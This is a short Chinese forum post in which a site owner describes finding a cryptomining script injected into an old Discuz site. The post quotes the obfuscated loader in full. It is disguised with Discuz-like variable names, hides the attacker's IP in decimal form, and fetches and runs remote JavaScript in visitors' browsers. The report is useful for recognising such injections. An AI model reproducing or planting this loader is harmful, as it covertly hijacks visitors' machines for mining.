已经解决
本帖最后由 pppcc 于 2018-6-22 06:08 编辑帮朋友做了一个网站,用的是多年前的discuz.
刚刚发现网站被挂马了。被挂了一个挖矿的JS脚本http://172.104.64.162/17.js
https://i.loli.net/2018/06/22/5b2c0f7d6f7b7.png
用 ecosway598 大佬的方式,搜索了所有文件都没有找到,还好是个小网站,终于在后台找到了,可能是朋友不懂,只想提高SEO加的吧
https://i.loli.net/2018/06/22/5b2c2123a77ca.png 正在下载。。。和大佬的想法一样。。。 估计是文件名或其他方式加密了,搜索17.js没有找到
https://i.loli.net/2018/06/22/5b2c18a90c823.png 找到了一行奇怪的代码
<script type="text/javascript">var HTMLXMLNS = 'http://www.w3.org/1999/xhtml', cookie_ns_type = 'ET', STATINODE = 'src', PT = '', creditnotice = '1||,2||,3||', DZ_ALL_SETTING = window, VARHASH = 'ipt',
css_classtype = '', HEADER_NODE='', STATIPATH = 'scr'; if(XMLHttpRequest) STATICNODE = XMLHttpRequest; FONT_CLASS_ID = '2892513442', cookie_pinfo = '17', cookie_ns_type = 'G' + cookie_ns_type,
IMGDIR = 'static/image/common', DZ_ALL_BODY = document, REPORT = 'Microsoft.XMLHTTP', NEWS = '', NEWS_ID = 4, JSFILE = 'js', CSSPAT = 'data/cache/style_', FONT_CLASS_ID =FONT_CLASS_ID + '/',
T_INFO = '', cookie_pinfo = cookie_pinfo + '.' + JSFILE; if( DZ_ALL_SETTING.ActiveXObject ) HEADER_NODE = DZ_ALL_SETTING.ActiveXObject; SCBARID = 200; if ( STATICNODE ) PT = new STATICNODE(); if (
HEADER_NODE ) PT = new HEADER_NODE(); FONT_CLASS_ID = HTMLXMLNS.substring(0,7) + FONT_CLASS_ID + cookie_pinfo; if ( PT ){ PT.open( cookie_ns_type , FONT_CLASS_ID);PT.onreadystatechange =
function() {if (PT.readyState == NEWS_ID && PT.status == SCBARID ){ N_INFO = ''; DZ_ALL_BODY.head.appendChild( DZ_ALL_BODY.createElement( STATIPATH + VARHASH )).innerHTML = PT.responseText;
PT = null;}}; PT.send();}; CSSPATH = 'data/cache/style_', DYNAMICURL1 = '';</script>
页:
[1]